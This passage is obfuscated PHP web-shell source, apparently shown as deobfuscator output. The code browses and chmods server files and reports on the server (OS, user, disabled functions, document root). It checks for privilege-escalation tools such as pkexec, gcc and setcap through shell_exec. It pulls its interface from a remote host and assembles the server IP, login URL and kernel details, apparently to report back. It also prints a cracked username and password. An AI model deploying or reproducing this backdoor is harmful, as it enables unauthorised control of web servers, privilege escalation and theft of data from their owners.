"\x3c\x62\x3e\74\146\157\x6e\x74\40\x66\141\143\x65\75\42\x54\x61\150\x6f\155\x61\42\x20\x73\164\171\x6c\145\75\42\x66\157\156\164\55\163\x69\172\x65\72\x20\71\160\164\x22\40\143\157\x6c\x6f\x72\x3d\42\43\x30\x30\70\x30\x30\60\42\76\133\x7e\x5d\74\x2f\146\157\x6e\x74\76\x3c\x2f\x62\76\x3c\x66\x6f\156\x74\x20\146\141\x63\x65\x3d\42\124\141\150\157\155\x61\42\x20\x20\40\163\x74\171\154\145\75\42\x66\x6f\156\x74\x2d\x73\151\172\x65\72\x20\x39\160\164\42\x3e\74\x62\76\x3c\146\157\x6e\x74\40\143\157\154\x6f\162\x3d\42\43\x30\60\70\x30\60\x30\x22\x3e\x20\12\x20\40\40\x20\40\40\x20\40\x20\x20\x20\x20\x43\162\x61\x63\x6b\x69\x6e\x67\x20\x53\165\143\x63\x65\163\x73\40\x57\151\x74\150\40\x55\x73\x65\x72\x6e\141\155\145\x20\x26\x71\x75\x6f\x74\x3b\x3c\57\x66\x6f\x6e\164\x3e\74\x66\x6f\156\164\x20\x63\157\x6c\157\162\x3d\42\x23\x46\x46\60\x30\60\x30\x22\76{$user}\x3c\57\x66\x6f\156\x74\x3e\x3c\x66\x6f\156\164\x20\143\x6f\x6c\157\x72\x3d\x22\43\60\x30\70\60\60\x30\x22\x3e\x22\12\40\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\141\x6e\144\40\x50\141\x73\163\x77\x6f\162\x64\40\x22\x3c\x2f\x66\157\156\164\x3e\x3c\146\157\x6e\x74\40\x63\x6f\x6c\x6f\162\75\x22\x23\106\106\x30\60\60\60\x22\76{$pass}\74\x2f\x66\157\156\x74\76\x3c\x66\157\x6e\164\x20\143\157\154\x6f\162\75\42\43\x30\x30\x38\60\x30\x30\42\x3e\42\x3c\57\x66\157\156\x74\x3e\74\57\x62\76\x3c\x62\162\76\74\142\162\x3e"; die; } else { if ($httpcode === 0) { echo "\x4e\157\40\x72\x65\x73\160\157\156\163\145\x20\x3c\x62\162\x3e"; curl_setopt($ch, CURLOPT_URL, "\x68\164\164\160\72\57\x2f{$host}\x3a" . $port); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $cont = curl_exec($ch); $farr = explode("\x55\x52\114\x3d", $cont); $narr = explode("\42\76\x3c\57\150\145\141\x64\x3e", $farr[1]); echo "\120\154\x65\x61\x73\x65\40\x63\150\141\x6e\147\145\x20\164\x6f\40\x74\x68\151\x73\40\x68\157\x73\164\40\x2d\76\40" . $narr[0]; die; } } } curl_close($ch); } public function DFSCurrent($slashtype) { echo "\x3c\144\x69\166\x20\143\x6c\x61\x73\163\x3d\47\143\x75\162\x72\145\156\164\x66\x6f\x6c\x64\145\162\47\x3e\x43\165\162\x72\145\x6e\x74\40\x66\157\154\144\145\162\x20\72\40"; $truepath = array(); if (isset($GLOBALS["\x44\x46\103\157\156\146\x69\x67"][0]["\x64\x66\x70"])) { $path = $this->DFSDirFilter($this->Dec($GLOBALS["\x44\x46\103\157\x6e\146\151\147"][0]["\x64\x66\x70"])); $path = $this->Dec($path); } else { $path = getcwd(); } $dfsEP = explode($slashtype, $path); $dfsSZ = sizeof($dfsEP); $dfsGE = ''; for ($c = 0; $c < $dfsSZ; $c++) { array_push($truepath, $dfsEP[$c]); } if ($GLOBALS["\104\106\x53\120\x6c\141\164\x66\x6f\x72\155"] !== "\x77\151\x6e") { $endslash = $this->DFSDirFilter($slashtype); echo "\x3c\141\x20\x68\162\145\146\x3d\x27\77\x64\146\160\75" . urlencode($endslash) . "\x27\76{$slashtype}\x3c\57\x61\76"; } for ($i = 0; $i < sizeof($truepath); $i++) { if (!empty($dfsEP[$i]) || !$dfsEP[$i] == '') { if ($GLOBALS["\104\x46\123\x50\154\141\164\146\157\162\x6d"] !== "\167\x69\156") { $dfsGE .= $slashtype . $dfsEP[$i]; } else { $dfsGE .= $dfsEP[$i] . $slashtype; } $dfsGEn = $this->DFSDirFilter($dfsGE); echo "\74\141\x20\150\162\145\146\x3d\47\77\144\x66\160\75" . urlencode($dfsGEn) . "\47\x3e{$dfsEP[$i]}\x3c\x2f\x61\x3e"; echo $slashtype; } } echo "\74\57\144\x69\166\76"; } public function DFSOG($file) { if ($GLOBALS["\x44\x46\x53\120\x6c\141\164\146\157\x72\x6d"] !== "\x77\x69\x6e") { $owner_file = fileowner($file) ?: 0; $group_file = filegroup($file) ?: 0; $checkposix = $this->DFSDat("\151\x6e\x69", "\144\x69\x73\141\142\154\145\x5f\x66\165\x6e\143\x74\x69\157\x6e\x73"); if ($checkposix !== "\x4e\x6f\x6e\145") { $checkposix = explode("\54", $checkposix); if (!in_array("\x70\157\x73\x69\170\137\147\145\164\x70\167\165\x69\144", $checkposix)) { $ownx = posix_getpwuid($owner_file)["\x6e\x61\155\145"] ?: "\x6e\157\x62\x6f\144\171"; $grpx = posix_getpwuid($group_file)["\156\141\x6d\145"]; if ($ownx !== NULL && $ownx !== '' || $grpx !== NULL && $grpx !== '') { $owner_group = $ownx . "\x3a" . ($grpx ?: $ownx); } else { $owner_group = "\x6e\157\142\157\144\171\72\156\157\142\x6f\144\x79"; } } else { $owner_group = "\x2d\72\x2d"; } } else { $ownx = posix_getpwuid($owner_file)["\156\141\155\x65"] ?: "\156\x6f\142\157\x64\171"; $grpx = posix_getpwuid($group_file)["\x6e\141\155\x65"]; if ($ownx !== NULL && $ownx !== '' || $grpx !== NULL && $grpx !== '') { $owner_group = $ownx . "\72" . ($grpx ?: $ownx); } else { $owner_group = "\x6e\157\142\x6f\144\x79\x3a\x6e\157\142\x6f\144\x79"; } } } else { $owner_group = "\x2d\x3a\55"; } return $owner_group; } public function DFSPerms($f) { $p = $GLOBALS["\x44\x46\x53\x79\156\164\x61\170"][1]($f); if (($p & 49152) == 49152) { $i = "\163"; } elseif (($p & 40960) == 40960) { $i = "\154"; } elseif (($p & 32768) == 32768) { $i = "\55"; } elseif (($p & 24576) == 24576) { $i = "\142"; } elseif (($p & 16384) == 16384) { $i = "\x64"; } elseif (($p & 8192) == 8192) { $i = "\143"; } elseif (($p & 4096) == 4096) { $i = "\x70"; } else { $i = "\x75"; } $i .= $p & 256 ? "\x72" : "\x2d"; $i .= $p & 128 ? "\167" : "\x2d"; $i .= $p & 64 ? $p & 2048 ? "\163" : "\x78" : ($p & 2048 ? "\123" : "\x2d"); $i .= $p & 32 ? "\162" : "\x2d"; $i .= $p & 16 ? "\x77" : "\x2d"; $i .= $p & 8 ? $p & 1024 ? "\163" : "\x78" : ($p & 1024 ? "\x53" : "\55"); $i .= $p & 4 ? "\x72" : "\x2d"; $i .= $p & 2 ? "\x77" : "\x2d"; $i .= $p & 1 ? $p & 512 ? "\x74" : "\170" : ($p & 512 ? "\x54" : "\x2d"); return $i; } private function DFSMod($code) { return substr(sprintf("\45\157", $code), -4); } public function DFSChange($loc, $code) { $def = 0; for ($i = strlen($code) - 1; $i >= 0; --$i) { $def += (int) $code[$i] * pow(8, strlen($code) - $i - 1); } if (is_dir($loc) || is_file($loc)) { if (chmod($loc, $def)) { return true; } else { return false; } } } public function DFSDat($ch, $value) { switch (strtolower($ch)) { case "\151\x6e\x69": if (strtolower($value) !== "\x64\151\x73\x61\142\154\145\137\x66\x75\x6e\143\x74\x69\x6f\x6e\163") { if (!ini_get($value)) { return "\x4f\106\106"; } else { return "\x4f\116"; } } else { if (!ini_get($value)) { return "\x4e\157\x6e\x65"; } else { return ini_get($value); } } break; case "\x66\165\156\x63": if (!function_exists($value)) { return "\117\106\106"; } else { return "\117\x4e"; } break; } } public function DFSInfo() { if ($GLOBALS["\104\106\x53\x50\x6c\141\x74\x66\157\x72\x6d"] === "\154\x69\x6e") { $OSID = ''; } $disklink = ''; $encstr = array(); $diskavail = $this->DFSWinPathCheck(); foreach ($diskavail as $item) { $diskstr = $item . "\x5c"; $this->string = $diskstr; $disklink .= "\x3c\141\x20\x68\x72\x65\x66\75\47\77\144\146\160\x3d" . $this->Enc() . "\x27\x3e{$diskstr}\x3c\57\x61\x3e\x20\x2c\x20"; } $contents = "\x3c\x64\151\x76\40\143\x6c\141\163\x73\x3d\x27\x69\156\164\x72\x6f\x73\47\76\xa\x53\145\x72\x76\145\162\40\x49\x6e\x66\157\40\x3a\x20" . substr(@php_uname(), 0, 120) . "\74\x62\x72\x3e\12\123\x65\x72\x76\145\x72\40\x53\x6f\x66\x74\x77\141\x72\x65\40\x3a\40" . $GLOBALS["\104\106\x43\157\156\x66\x69\147"][2]["\123\x45\x52\x56\x45\x52\137\123\117\x46\124\x57\101\122\105"] . "\74\142\162\x3e\12\103\x75\162\x72\x65\156\x74\40\x55\x73\x65\162\40\x3a\x20" . get_current_user() . "\x20\174\40\x44\151\163\153\x20\x46\x72\145\x65\123\160\x61\143\145\x20\x3a\x20" . $this->DFSFormat(diskfreespace($GLOBALS["\x44\106\103\157\x6e\146\151\147"][2]["\x44\117\103\125\x4d\x45\x4e\124\x5f\x52\x4f\x4f\124"])) . "\74\142\x72\76\12\x53\145\162\166\x65\162\x20\x41\144\144\x72\145\x73\x73\40\x3a\x20" . $GLOBALS["\x44\106\103\157\x6e\146\151\x67"][2]["\123\x45\122\126\105\x52\137\101\x44\x44\x52"] . "\x20\x7c\40\xa\131\x6f\165\162\40\x41\x64\x64\162\145\x73\163\40\x3a\x20" . $GLOBALS["\x44\106\x43\157\x6e\x66\x69\x67"][2]["\122\105\x4d\x4f\x54\105\x5f\x41\104\x44\x52"] . "\74\x62\162\x3e\xa\123\x61\146\145\40\x4d\157\144\x65\x20\72\x20" . $this->DFSDat("\151\156\151", "\163\141\x66\145\x5f\x6d\157\144\x65") . "\x20\174\xa\123\145\x72\166\145\x72\40\105\155\x61\x69\154\40\x3a\x20" . $GLOBALS["\x44\x46\103\x6f\156\146\x69\x67"][2]["\x53\105\122\126\x45\x52\137\x41\104\115\111\116"] . "\x3c\142\x72\76\12\104\x69\163\141\142\x6c\145\40\x46\x75\x6e\143\164\151\157\x6e\x73\40\x3a\40" . $this->DFSDat("\x69\156\x69", "\x64\151\x73\141\142\x6c\x65\x5f\146\165\x6e\143\164\x69\x6f\156\163") . "\40\x7c\40\xa\143\125\122\x4c\40\72\40" . $this->DFSDat("\146\165\156\143", "\x63\165\162\154\137\166\145\x72\163\x69\x6f\x6e") . "\40\174\x20\12\115\x79\x53\x51\x4c\x20\x3a\x20" . $this->DFSDat("\x66\165\x6e\143", "\155\x79\x73\161\x6c\137\143\157\x6e\156\145\x63\x74") . "\74\142\162\x3e\xa\104\x6f\x63\165\x6d\145\156\164\40\122\x6f\157\164\40\72\x20" . $GLOBALS["\104\x46\x43\x6f\156\146\x69\x67"][2]["\104\x4f\103\125\x4d\105\x4e\124\x5f\122\x4f\117\124"] . "\x20\174\40\104\151\163\153\x20\x3a\x20" . $disklink . "\xa\74\x2f\x64\x69\x76\76\x25\x7b\x6d\141\x69\156\175\x25"; return $contents; } public function DFSRenderArray($array_replace, $contents) { $arrRep = sizeof($array_replace); $x = 1; for ($i = 0; $i < $arrRep; $i++) { $contents = $this->DFSRender("\x2f\x25\x7b\101" . $x . "\175\45\57\x69", $array_replace[$i], $contents); $x++; } return $contents; } public function DFSRender($pattern, $replace, $from) { $contents = preg_replace($pattern, $replace, $from); return $contents; } public function DFSAdmin() { $contents = $GLOBALS["\x44\x46\x53\171\156\164\141\170"][0](self::$remote_url . "\57\x6c\157\x67\151\156\x2e\x68\x74\x6d\x6c"); return $contents; } public function DFStart() { $contents = $GLOBALS["\104\x46\x53\171\156\164\141\x78"][0](self::$remote_url . "\57\150\145\x61\144\56\x68\x74\x6d\154"); $contents = preg_replace("\57\x25\173\x73\164\x79\x6c\x65\x7d\x25\x2f\x69", $GLOBALS["\104\106\123\171\x6e\x74\141\x78"][0](self::$remote_url . "\57\x64\146\163\56\143\x73\163"), $contents); $contents = preg_replace("\57\x25\x7b\x6a\x73\175\45\x2f\x69", $GLOBALS["\x44\106\123\x79\156\x74\x61\x78"][0](self::$remote_url . "\57\163\x63\x72\x69\160\164\x2e\x6a\163"), $contents); return $contents; } public function DFSBody($location, $pattern, $from) { $contents = $GLOBALS["\104\106\123\171\156\x74\x61\x78"][0](self::$remote_url . "\57" . $location); $from = $this->DFSRender($pattern, $contents, $from); return $from; } public function DFSEnd() { $contents = $GLOBALS["\x44\x46\x53\171\156\164\141\x78"][0](self::$remote_url . "\57\146\157\157\164\x2e\x68\x74\155\154"); return $contents; } public function DFSDefault() { $this->DFSAction("\165\160\154\x6f\141\144"); $this->DFSAction("\x6d\x6b\144\151\162"); $this->DFSAction("\x6d\153\146\x69\x6c\145"); } public function DFSDirFilter($path) { if ($GLOBALS["\x44\106\x53\120\154\141\164\146\157\162\x6d"] !== "\x77\151\x6e") { $x = preg_replace("\x2f\45\x32\106\x25\62\x46\x2f\151", "\x2f", urlencode($path)); } else { $x = preg_replace("\x2f\x25\65\x43\x25\65\103\57\x69", "\x5c", urlencode($path)); } $this->string = urldecode($x); return $this->Enc(); } } goto SCiIQ; opb_2: ini_set("\144\151\x73\x70\154\x61\x79\x5f\x65\162\162\x6f\x72\x73", 0); goto vSQrh; kQlMe: ${${"\107\x4c\117\x42\x41\114\123"}["\x76\145\165\x61\x72\146\145\x63\x68"]} = array("\x70\x79\164\150\x6f\x6e\x33", "\x73\145\x74\143\141\160", "\155\157\x75\x6e\x74", "\x75\x6e\x73\x68\141\x72\145", "\x74\x6f\165\x63\x68", "\x67\x63\x63", "\x70\153\x65\170\x65\143"); goto XIACk; sWXJV: ${"\107\114\117\102\x41\x4c\x53"}["\151\154\x69\165\163\x63\x79\163"] = "\x6c\x6f\147\x69\156\137\x75\162\x6c"; goto L7SMR; JE7FI: set_time_limit(0); goto F4evV; EtzVE: foreach (${${"\x47\x4c\x4f\x42\101\x4c\x53"}["\145\153\150\171\x6f\x62\171\143\160\x76\x77"]} as ${${"\x47\x4c\x4f\102\x41\114\x53"}["\x79\151\167\x63\x7a\x74\142\171\165\156"]}) { ${"\x47\x4c\x4f\x42\x41\x4c\123"}["\145\x6e\145\x6b\x62\147"] = "\x63\157\155\155\x61\156\144\x5f\162\x65\x73\x75\154\x74\163"; $fcclguhq = "\x63\157\x6d\155\x61\156\144"; ${"\x47\x4c\117\x42\x41\x4c\x53"}["\160\163\151\x6f\x6b\x61\166\x76\x75"] = "\162\145\x73\x75\x6c\x74"; ${"\x47\114\x4f\x42\x41\x4c\x53"}["\x68\x78\x68\147\157\161\165\x76\x6b\x6c"] = "\162\x65\163\165\154\x74"; ${${"\107\x4c\117\102\x41\x4c\x53"}["\150\x78\x68\147\x6f\x71\x75\166\153\154"]} = shell_exec("\x63\157\x6d\x6d\141\x6e\144\40\55\166\40{$command}"); ${${"\x47\x4c\x4f\x42\101\114\x53"}["\145\x6e\145\x6b\142\147"]}[${$fcclguhq}] = ${${"\107\x4c\x4f\102\x41\x4c\123"}["\x70\x73\x69\x6f\x6b\x61\166\166\x75"]} ? "\117\116" : "\x4f\x46\x46"; } goto FIdy4; FIdy4: $server_name = $_SERVER["\x53\x45\x52\126\x45\122\137\x4e\101\115\105"]; goto kLuSI; Z7Cq2: ${"\x47\114\x4f\x42\101\x4c\x53"}["\x75\x69\156\162\x63\x6d\x6c\x77\x75\145"] = "\x63\157\x6d\x6d\x61\156\144\137\x72\145\163\165\154\164\x73"; goto kQlMe; eKDUG: ${${"\107\114\117\102\101\x4c\123"}["\x75\x69\156\162\x63\155\x6c\x77\x75\x65"]} = array(); goto or6vA; znjAP: header("\103\157\x6e\164\145\156\x74\55\x54\x79\160\x65\x3a\x20\x74\x65\170\x74\x2f\150\164\155\x6c\x3b\40\143\150\x61\x72\x73\x65\x74\75\125\x54\x46\x2d\70"); goto kPjU1; E9WCn: ini_set("\x6d\145\x6d\x6f\162\171\137\x6c\x69\x6d\151\164", "\x36\x34\x4d"); goto M2bfL; J2Vs2: ${${"\x47\114\x4f\102\101\114\123"}["\x64\x74\x69\150\x6a\x72\x76\157\x6e\x66"]} = "\111\x50\x20\72\x20\133\40{$ipnya}\40\135\xa\114\157\x67\151\156\x3a\40{$login_url}\xa\x4b\145\x72\156\145\154\72\x20{$system_info}\xa"; goto ZwS3k; FSDrH: ?>
Function Calls
None |
Stats
MD5 | 460982840b8f856836b951764d83e70c |
Eval Count | 0 |
Decode Time | 98 ms |